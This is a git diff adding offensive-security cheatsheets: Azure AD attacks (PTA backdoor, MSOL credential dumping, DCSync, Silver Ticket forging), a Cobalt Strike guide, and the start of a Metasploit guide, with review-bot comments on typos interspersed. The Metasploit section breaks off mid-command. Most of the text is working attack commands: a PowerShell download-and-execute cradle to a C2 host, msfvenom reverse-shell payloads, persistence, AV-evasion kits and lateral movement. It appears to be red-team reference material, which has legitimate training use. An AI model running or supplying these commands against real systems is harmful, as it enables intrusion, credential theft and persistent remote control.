Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule` +2. Install a PTA Backdoor + ```powershell + PS AADInternals> Install-AADIntPTASpy + PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords + ``` + + +### Azure AD Connect - Password extraction + +Credentials in AD Sync : C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf + +Tool | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally +--- | --- | --- | --- | --- +ADSyncDecrypt | Yes | Yes | No | No +ADSyncGather | Yes | No | No | Yes +ADSyncQuery | No (network RPC calls only) | No | Yes | Yes + + +```powershell +git clone https://github.com/fox-it/adconnectdump +# DCSync with AD Sync account +``` + +### Azure AD Connect - MSOL Account's password and DCSync + +You can perform **DCSync** attack using the MSOL account. + +Requirements: + * Compromise a server with Azure AD Connect service + * Access to ADSyncAdmins or local Administrators groups + +Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account: +* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545 +* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c + +Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. + + +### Azure AD Connect - Seamless Single Sign On Silver Ticket + +> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA) + +> Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD. + +:warning: The password of the AZUREADSSOACC account never changes. 
+ +Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure + +1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`. + ```powershell + mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit + ``` +2. AAD logon name of the user we want to impersonate, e.g. `elrond@contoso.com`. This is typically either his userPrincipalName or mail attribute from the on-prem AD. +3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`. +4. Create the Silver Ticket and inject it into Kerberos cache: + ```powershell + mimikatz.exe "kerberos::golden /user:elrond + /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 + /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd + /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit + ``` +5. Launch Mozilla Firefox +6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com` +7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty. 
+ + +## References + +* [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer) +* [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!](https://www.youtube.com/watch?v=51FSvndgddk&list=WL) +* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94) +* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) +* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html) +* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/) +* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) +* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) +* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) +* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) +* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) +* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20) +* [Windows Azure 
Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE) +* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) +* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) +* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) +* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) +* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html) +* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) +* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) \ No newline at end of file 
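Review bot: the YouTube reference "Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!" carries a `&list=WL` query parameter, which is the committer's personal Watch Later playlist rather than part of the video's address; drop it so the link is `https://www.youtube.com/watch?v=51FSvndgddk`. Two smaller points in the same list: the Derk van der Woude entry has a truncated title (`... by Microsoft Defender for …`) that should be completed from the linked post, and the file ends with `\ No newline at end of file`, which Markdown linters flag; add the trailing newline.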
diff --git a/docs/cloud/test/B.md b/docs/cloud/azure/access-and-token.md similarity index 100% rename from docs/cloud/test/B.md rename to docs/cloud/azure/access-and-token.md diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md new file mode 100644 index 0000000..e69de29 diff --git a/docs/cloud/test/A.md b/docs/cloud/azure/enumeration.md similarity index 100% rename from docs/cloud/test/A.md rename to docs/cloud/azure/enumeration.md diff --git a/docs/command-control/Cobalt Strike - Cheatsheet.md b/docs/command-control/Cobalt Strike - Cheatsheet.md new file mode 100644 index 0000000..e84435c --- /dev/null +++ b/docs/command-control/Cobalt Strike - Cheatsheet.md 
@@ -0,0 +1,491 @@ +# Cobalt Strike + +> Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity. + + +```powershell +$ sudo apt-get update +$ sudo apt-get install openjdk-11-jdk +$ sudo apt install proxychains socat +$ sudo update-java-alternatives -s java-1.11.0-openjdk-amd64 +$ sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile] +$ ./cobaltstrike +$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" +``` + +## Summary + +* [Infrastructure](#infrastructure) + * [Redirectors](#redirectors) + * [Domain fronting](#domain-fronting) +* [OpSec](#opsec) + * [Customer ID](#customer-id) +* [Payloads](#payloads) + * [DNS Beacon](#dns-beacon) + * [SMB Beacon](#smb-beacon) + * [Metasploit compatibility](#metasploit-compatibility) + * [Custom Payloads](#custom-payloads) +* [Malleable C2](#malleable-c2) +* [Files](#files) +* [Powershell and .NET](#powershell-and-net) + * [Powershell commabds](#powershell-commands) + * [.NET remote execution](#net-remote-execution) +* [Lateral Movement](#lateral-movement) +* [VPN & Pivots](#vpn--pivots) +* [Kits](#kits) + * [Elevate Kit](#elevate-kit) + * [Persistence Kit](#persistence-kit) + * [Resource Kit](#resource-kit) + * [Artifact Kit](#artifact-kit) + * [Mimikatz Kit](#mimikatz-kit) + * [Sleep Mask Kit](#sleep-mask-kit) + * [Thread Stack Spoofer](#thread-stack-spoofer) +* [Beacon Object Files](#beacon-object-files) +* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) +* [References](#references) + + +## Infrastructure + +### Redirectors + +```powershell +sudo apt install socat 
+socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80 +``` + +### Domain Fronting + +* New Listener > HTTP Host Header +* Choose a domain in "Finance & Healthcare" sector + +## OpSec + +**Don't** +* Use default self-signed HTTPS certificate +* Use default port (50050) +* Use 0.0.0.0 DNS response +* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D` + +**Do** +* Use a redirector (Apache, CDN, ...) +* Firewall to only accept HTTP/S from the redirectors +* Firewall 50050 and access via SSH tunnel +* Edit default HTTP 404 page and Content type: text/plain +* No staging `set hosts_stage` to `false` in Malleable C2 +* Use Malleable Profile to taylor your attack to specific actors + +### Customer ID + +> The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike. + +* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later. +* The trial has a Customer ID value of 0. +* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool + +## Payloads + +### DNS Beacon + +* Edit the Zone File for the domain +* Create an A record for Cobalt Strike system +* Create an NS record that points to FQDN of your Cobalt Strike system + +Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record. + +* nslookup jibberish.beacon polling.campaigns.domain.com +* nslookup jibberish.beacon campaigns.domain.com + +Example of DNS on Digital Ocean: + +```powershell +NS example.com directs to 10.10.10.10. 86400 +NS polling.campaigns.example.com directs to campaigns.example.com. 
3600 +A campaigns.example.com directs to 10.10.10.10 3600 +``` + +```powershell +systemctl disable systemd-resolved +systemctl stop systemd-resolved +rm /etc/resolv.conf +echo "nameserver 8.8.8.8" > /etc/resolv.conf +echo "nameserver 8.8.4.4" >> /etc/resolv.conf +``` + +Configuration: +1. **host**: campaigns.domain.com +2. **beacon**: polling.campaigns.domain.com +3. Interact with a beacon, and `sleep 0` + + +### SMB Beacon + +```powershell +link [host] [pipename] +connect [host] [port] +unlink [host] [PID] +jump [exec] [host] [pipe] +``` + +SMB Beacon uses Named Pipes. You might encounter these error code while running it. + +| Error Code | Meaning | Description | +|------------|----------------------|----------------------------------------------------| +| 2 | File Not Found | There is no beacon for you to link to | +| 5 | Access is denied | Invalid credentials or you don't have permission | +| 53 | Bad Netpath | You have no trust relationship with the target system. It may or may not be a beacon there. 
| + + +### SSH Beacon + +```powershell +# deploy a beacon +beacon> help ssh +Use: ssh [target:port] [user] [pass] +Spawn an SSH client and attempt to login to the specified target + +beacon> help ssh-key +Use: ssh [target:port] [user] [/path/to/key.pem] +Spawn an SSH client and attempt to login to the specified target + +# beacon's commands +upload Upload a file +download Download a file +socks Start SOCKS4a server to relay traffic +sudo Run a command via sudo +rportfwd Setup a reverse port forward +shell Execute a command via the shell +``` + +### Metasploit compatibility + +* Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https +* Set LHOST and LPORT to the beacon +* Set DisablePayloadHandler to True +* Set PrependMigrate to True +* exploit -j + +### Custom Payloads + +https://ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c + +```powershell +* Attacks > Packages > Payload Generator +* Attacks > Packages > Scripted Web Delivery (S) +$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor +$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml +$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml +``` + +## Malleable C2 + +List of Malleable Profiles hosted on Github +* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles +* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 +* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles +* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint + +Example of syntax + +```powershell +set useragent "SOME AGENT"; # GOOD +set useragent 'SOME AGENT'; # BAD +prepend "This is an example;"; + +# Escape Double quotes +append "here is \"some\" stuff"; +# Escape Backslashes +append "more \\ stuff"; +# Some special characters do not 
need escaping +prepend "!@#$%^&*()"; +``` + +Check a profile with `./c2lint`. +* A result of 0 is returned if c2lint completes with no errors +* A result of 1 is returned if c2lint completes with only warnings +* A result of 2 is returned if c2lint completes with only errors +* A result of 3 is returned if c2lint completes with both errors and warning + +## Files + +```powershell +# List the file on the specified directory +beacon > ls + +# Change into the specified working directory +beacon > cd [directory] + +# Delete a file\folder +beacon > rm [file\folder] + +# File copy +beacon > cp [src] [dest] + +# Download a file from the path on the Beacon host +beacon > download [C:\filePath] + +# Lists downloads in progress +beacon > downloads + +# Cancel a download currently in progress +beacon > cancel [*file*] + +# Upload a file from the attacker to the current Beacon host +beacon > upload [/path/to/file] +``` + +## Powershell and .NET + +### Powershell commands + +```powershell +# Import a Powershell .ps1 script from the control server and save it in memory in Beacon +beacon > powershell-import [/path/to/script.ps1] + +# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned. +beacon > powershell [commandlet][arguments] + +# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto +beacon > powerpick [commandlet] [argument] + +# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs +beacon > psinject [pid][arch] [commandlet] [arguments] +``` + +### .NET remote execution + +Run a local .NET executable as a Beacon post-exploitation job. + +Require: +* Binaries compiled with the "Any CPU" configuration. 
+ +```powershell +beacon > execute-assembly [/path/to/script.exe] [arguments] +beacon > execute-assembly /home/audit/Rubeus.exe +[*] Tasked beacon to run .NET program: Rubeus.exe +[+] host called home, sent: 318507 bytes +[+] received output: + + ______ _ + (_____ \ | | + _____) )_ _| |__ _____ _ _ ___ + | __ /| | | | _ \| ___ | | | |/___) + | | \ \| |_| | |_) ) ____| |_| |___ | + |_| |_|____/|____/|_____)____/(___/ + + v1.4.2 +``` + +## Lateral Movement + +:warning: OPSEC Advice: Use the **spawnto** command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe + +- **portscan:** Performs a portscan on a specific target. +- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user. +- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \ +:exclamation: This module needs Administrator privileges. +- **steal_token:** Steal a token from a specified process. +- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user. +- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \ +:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \ +:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network. +- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \ +:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target. +- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts. 
+ +:warning: All the commands launch powershell.exe + +```powershell +Beacon Remote Exploits +====================== +jump [module] [target] [listener] + + psexec x86 Use a service to run a Service EXE artifact + psexec64 x64 Use a service to run a Service EXE artifact + psexec_psh x86 Use a service to run a PowerShell one-liner + winrm x86 Run a PowerShell script via WinRM + winrm64 x64 Run a PowerShell script via WinRM + +Beacon Remote Execute Methods +============================= +remote-exec [module] [target] [command] + + Methods Description + ------- ----------- + psexec Remote execute via Service Control Manager + winrm Remote execute via WinRM (PowerShell) + wmi Remote execute via WMI (PowerShell) + +``` + +Opsec safe Pass-the-Hash: +1. `mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"` +2. `steal_token PID` + +### Assume Control of Artifact + +* Use `link` to connect to SMB Beacon +* Use `connect` to connect to TCP Beacon + + +## VPN & Pivots + +:warning: Covert VPN doesn't work with W10, and requires Administrator access to deploy. + +> Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second. + +```powershell +# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage. +beacon > socks [PORT] +beacon > socks [port] +beacon > socks [port] [socks4] +beacon > socks [port] [socks5] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging] + +# Proxy browser traffic through a specified Internet Explorer process. 
+beacon > browserpivot [pid] [x86|x64] + +# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port. +beacon > rportfwd [bind port] [forward host] [forward port] + +# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller. ~= rportfwd + shspawn. +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin +beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin + +# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller +# then you can handle the connect back on your MSF multi handler +beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin +``` + +## Kits + +* [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike + +### Elevate Kit + +UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018) + +```powershell +beacon> runasadmin + +Beacon Command Elevators +======================== + + Exploit Description + ------- ----------- + ms14-058 TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113) + ms15-051 Windows ClientCopyImage Win32k Exploit (CVE 2015-1701) + ms16-016 mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051) + svc-exe Get SYSTEM via an executable run as a service + uac-schtasks Bypass UAC with schtasks.exe (via SilentCleanup) + uac-token-duplication Bypass UAC with Token Duplication +``` + +### Persistence Kit + +* https://github.com/0xthirteen/MoveKit +* https://github.com/fireeye/SharPersist + ```powershell + # List persistences + SharPersist -t schtaskbackdoor -m list + SharPersist -t startupfolder -m list + SharPersist -t schtask -m list + + # Add a persistence + SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m 
add + SharPersist -t schtaskbackdoor -n "Something Cool" -m remove + + SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add + SharPersist -t service -n "Some Service" -m remove + + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly + SharPersist -t schtask -n "Some Task" -m remove + ``` + +### Resource Kit + +> The Resource Kit is Cobalt Strike's means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows + +### Artifact Kit + +> Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder. + +Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : + +- Download the artifact kit : `Go to Help -> Arsenal to download Artifact Kit (requires a licensed version of Cobalt Strike)` +- Install the dependencies : `sudo apt-get install mingw-w64` +- Edit the Artifact code + * Change pipename strings + * Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc + * Change Import +- Build the Artifact +- Cobalt Strike -> Script Manager > Load .cna + +### Mimikatz Kit + +* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724) +* Load the mimikatz.cna aggressor script +* Use mimikatz functions as normal + +### Sleep Mask Kit + +> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. 
+ +Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. + +### Thread Stack Spoofer + +> An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. + +Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`. + +## Beacon Object Files + +> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs + +Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h + +* Compile + ```ps1 + # To compile this with Visual Studio: + cl.exe /c /GS- hello.c /Fohello.o + + # To compile this with x86 MinGW: + i686-w64-mingw32-gcc -c hello.c -o hello.o + + # To compile this with x64 MinGW: + x86_64-w64-mingw32-gcc -c hello.c -o hello.o + ``` +* Execute: `inline-execute /path/to/hello.o` + +## NTLM Relaying via Cobalt Strike + +```powershell +beacon> socks 1080 +kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb:// +beacon> rportfwd_local 8445 445 +beacon> upload C:\Tools\PortBender\WinDivert64.sys +beacon> PortBender redirect 445 8445 +``` + +## References + +* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI) +* [Red Team Ops with Cobalt Strike (2 of 9): Infrastructure](https://www.youtube.com/watch?v=5gwEMocFkc0) +* [Red Team Ops with Cobalt Strike (3 of 9): C2](https://www.youtube.com/watch?v=Z8n9bIPAIao) +* [Red Team Ops with Cobalt Strike (4 of 9): Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk) +* [Red Team Ops with Cobalt 
Strike (5 of 9): Initial Access](https://www.youtube.com/watch?v=bYt85zm4YT8) +* [Red Team Ops with Cobalt Strike (6 of 9): Post Exploitation](https://www.youtube.com/watch?v=Pb6yvcB2aYw) +* [Red Team Ops with Cobalt Strike (7 of 9): Privilege Escalation](https://www.youtube.com/watch?v=lzwwVwmG0io) +* [Red Team Ops with Cobalt Strike (8 of 9): Lateral Movement](https://www.youtube.com/watch?v=QF_6zFLmLn0) +* [Red Team Ops with Cobalt Strike (9 of 9): Pivoting](https://www.youtube.com/watch?v=sP1HgUu7duU&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no&index=10&t=0s) +* [A Deep Dive into Cobalt Strike Malleable C2 - Joe Vest - Sep 5, 2018 ](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b) +* [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/) +* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) +* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) +* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) +* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) +* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) +* [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf) diff --git a/docs/command-control/Metasploit - Cheatsheet.md b/docs/command-control/Metasploit - Cheatsheet.md new file mode 100644 index 0000000..bf3917b --- /dev/null 
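Review bot: in the SSH Beacon block the `help ssh-key` output repeats the usage line of the other command (`Use: ssh [target:port] [user] [/path/to/key.pem]`); the command being documented is `ssh-key`, so it should read `Use: ssh-key [target:port] [user] [/path/to/key.pem]`. The Summary is out of sync with the body: it omits the `SSH Beacon` and `Assume Control of Artifact` sections and misspells `Powershell commabds`. In Lateral Movement, `:warning: All the commands launch powershell.exe` contradicts the table directly below it, where `psexec` and `psexec64` are described as "Use a service to run a Service EXE artifact"; limit the warning to `psexec_psh`, `winrm` and `winrm64`. Minor: `taylor` -> `tailor`, `lateraly` -> `laterally`, `these error code` -> `these error codes`, and the installation, redirector and `systemd-resolved` blocks are fenced as `powershell` while containing Linux shell commands (`sudo apt install socat`), so `bash` is the accurate fence language.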
+++ b/docs/command-control/Metasploit - Cheatsheet.md 
@@ -0,0 +1,234 @@ +# Metasploit + +## Summary + +* [Installation](#installation) +* [Sessions](#sessions) +* [Background handler](#background-handler) +* [Meterpreter - Basic](#meterpreter---basic) + * [Generate a meterpreter](#generate-a-meterpreter) + * [Meterpreter Webdelivery](#meterpreter-webdelivery) + * [Get System](#get-system) + * [Persistence Startup](#persistence-startup) + * [Network Monitoring](#network-monitoring) + * [Portforward](#portforward) + * [Upload / Download](#upload---download) + * [Execute from Memory](#execute-from-memory) + * [Mimikatz](#mimikatz) + * [Pass the Hash - PSExec](#pass-the-hash---psexec) + * [Use SOCKS Proxy](#use-socks-proxy) +* [Scripting Metasploit](#scripting-metasploit) +* [Multiple transports](#multiple-transports) +* [Best of - Exploits](#best-of---exploits) +* [References](#references) + +## Installation + +```powershell +curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall +``` + +## Sessions + +```powershell +CTRL+Z -> Session in Background +sessions -> List sessions +sessions -i session_number -> Interact with Session with id +sessions -u session_number -> Upgrade session to a meterpreter +sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter + +sessions -c cmd -> Execute a command on several sessions +sessions -i 10-20 -c "id" -> Execute a command on several sessions +``` + +## Background handler + +ExitOnSession : the handler will not exit if the meterpreter dies. 
+ +```powershell +screen -dRR +sudo msfconsole + +use exploit/multi/handler +set PAYLOAD generic/shell_reverse_tcp +set LHOST 0.0.0.0 +set LPORT 4444 +set ExitOnSession false + +generate -o /tmp/meterpreter.exe -f exe +to_handler + +[ctrl+a] + [d] +``` + +## Meterpreter - Basic + +### Generate a meterpreter + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh +$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl +``` + +### Meterpreter Webdelivery + +Set up a Powershell web delivery listening on port 8080. + +```powershell +use exploit/multi/script/web_delivery +set TARGET 2 +set payload windows/x64/meterpreter/reverse_http +set LHOST 10.0.0.1 +set LPORT 4444 +run +``` + +```powershell +powershell.exe -nop -w hidden -c $g=new-object 